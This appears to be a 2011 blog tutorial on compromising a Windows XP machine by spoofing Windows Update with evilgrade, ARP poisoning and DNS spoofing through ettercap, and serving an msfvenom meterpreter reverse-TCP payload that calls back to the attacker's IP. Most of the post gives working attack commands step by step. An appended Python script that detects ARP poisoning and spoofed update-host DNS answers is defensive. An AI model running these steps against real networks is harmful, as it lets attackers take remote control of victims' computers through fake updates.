Monday, August 15, 2011

Hacking with Evilgrade on Backtrack5


After installing evilgrade on Backtrack5 (see the tutorial on how to install evilgrade on Backtrack5), we can now try using it. In this tutorial, we will use the new Metasploit tool named "msfvenom" to create the shell and use it to pwn the victim. You can download this tutorial document and my ettercap-ng, which I compiled myself, at the end of this post.

Attacker IP: 192.168.168.156 [Backtrack 5 Gnome Desktop 64Bit]
Victim IP: 192.168.168.159 [Windows XP SP2]

1. Go to path of evilgrade and run it.
   $ cd /pentest/exploits/isr-evilgrade 
   $ ./evilgrade 

2. After all modules have loaded, you can list them with this command.
   evilgrade> show modules

3. Pick the module that you want to spoof. In this tutorial I pick "winupdate", to pwn a victim machine whose user wants to update Windows.
   evilgrade> configure winupdate


4. Show options of this module.
   evilgrade(winupdate)> show options

5. Set the agent to run when the victim requests a Windows update. In this step, we use msfvenom to create and encode the payload.
   evilgrade(winupdate)> set agent '["/pentest/exploits/framework3/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.168.156 LPORT=445 -f exe  1> <%OUT%>/tmp/windowsupdate.exe<%OUT%>"]'


6. Make sure that no DNS service (port 53) is running on the host and that the port set as LPORT in step 5 is not in use.


7. Start the evilgrade server.
   evilgrade(winupdate)> start

8. Edit /usr/share/ettercap/etter.dns with any text editor and set spoofed DNS resolution for "windowsupdate.microsoft.com", "update.microsoft.com", "www.microsoft.com" and "go.microsoft.com", as in this picture.



9. Run ettercap with the -G option for the GUI.
   $ ettercap -G

10. Go to Sniff -> Unified Sniffing

11. Choose the interface you want to sniff.

12. Enable the DNS spoofing plugin by going to Plugins -> Manage the Plugins -> Double Click "dns_spoof"


13. Scan for machines on the same network by going to Hosts -> Scan for hosts

14. View the hosts on the network and set the victim by going to Hosts -> Hosts list -> Click Gateway IP and [Add to Target 1] -> Click Victim IP and [Add to Target 2]


15. Start the attack by going to Mitm -> Arp poisoning -> Click Sniff remote connections

16. Start sniffing by going to Start -> Start Sniffing

*** If you get the message "Dissector "dns" not supported" from ettercap, fix it with these steps:
  1. Get the source from http://ettercap.sourceforge.net 
  
  2. Extract it with tar xzvf ettercap-ng-0.7.3.tar.gz


  3. Edit configure file
      -  in line 29472: ac_cv_search_dn_expand="-lresolv"
      -  in line 29669: if true; then
      -  in line 29676: ac_ec_dns=yes


  4. Edit src/ec_log.c file
      -  in line 193: fd->fd = open(filename, O_CREAT | O_TRUNC | O_RDWR | O_BINARY, 0666);
  5. Save and exit

  6. Compile and install it with ./configure && make && make install
  7. Change DNS Record in /usr/local/share/ettercap/etter.dns 


Source: http://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwebcache.googleusercontent.com%2Fsearch%3Fq%3Dcache%3AONv78qOlYGkJ%3Aunknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20%2520http%3A%2F%2Funknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20

17. Use Metasploit's msfcli command to create a listening service for the connection from the victim machine.
      $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=445 LHOST=192.168.168.156

18. On the victim machine, try to update Windows. The request is redirected from windowsupdate.microsoft.com to the attacker machine, and a popup asks the victim to download the update file.

 

19. When the victim runs the update file, we will get the meterpreter.
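
Seen from the victim's network, steps 8 to 16 leave two traces: after ARP poisoning the gateway IP and the attacker IP share one MAC address in the ARP cache, and dns_spoof makes the update hostnames resolve to an address on the LAN. The script below checks for both; it is an added example, not part of the original post, and the gateway address, the MAC and the sample DNS answers are constructed assumptions.

```python
import ipaddress
import re

# Hostnames the tutorial spoofs in etter.dns (step 8).
UPDATE_HOSTS = {"windowsupdate.microsoft.com", "update.microsoft.com",
                "www.microsoft.com", "go.microsoft.com"}

# Matches "IP  MAC" (Windows `arp -a`) and "(IP) at MAC" (Linux `arp -a`).
ARP_ENTRY = re.compile(
    r"\(?(\d+\.\d+\.\d+\.\d+)\)?\s+(?:at\s+)?"
    r"([0-9a-fA-F]{2}(?:[:-][0-9a-fA-F]{2}){5})")

# Constructed sample: ARP cache of the victim during step 15. The gateway
# address 192.168.168.1 and the MAC are assumptions, not from the post.
SAMPLE_ARP = """\
Interface: 192.168.168.159 --- 0x2
  Internet Address      Physical Address      Type
  192.168.168.1         00-0c-29-aa-bb-cc     dynamic
  192.168.168.156       00-0c-29-aa-bb-cc     dynamic
"""

# Constructed sample: (queried name, answer) pairs taken from a DNS log.
SAMPLE_DNS = [
    ("update.microsoft.com", "192.168.168.156"),   # spoofed by dns_spoof
    ("www.microsoft.com.", "13.107.4.50"),         # constructed public address
    ("intranet.example", "192.168.168.20"),        # private, but not a watched name
]

def shared_macs(arp_output):
    """Return {mac: [ips]} for each MAC claimed by more than one IP address."""
    by_mac = {}
    for ip, mac in ARP_ENTRY.findall(arp_output):
        by_mac.setdefault(mac.lower().replace("-", ":"), set()).add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def spoofed_update_answers(answers):
    """Return answers where a watched update hostname maps to a non-public IP."""
    return [(name, ip) for name, ip in answers
            if name.rstrip(".").lower() in UPDATE_HOSTS
            and not ipaddress.ip_address(ip).is_global]

if __name__ == "__main__":
    for mac, ips in shared_macs(SAMPLE_ARP).items():
        print(f"ARP: {mac} is claimed by {', '.join(ips)}")
    for name, ip in spoofed_update_answers(SAMPLE_DNS):
        print(f"DNS: {name} resolved to non-public address {ip}")
```

The DNS check only covers the case shown in this tutorial, where the spoofed answer is an address on the local network; a spoofed answer pointing at a public address would need a comparison against a trusted resolver instead.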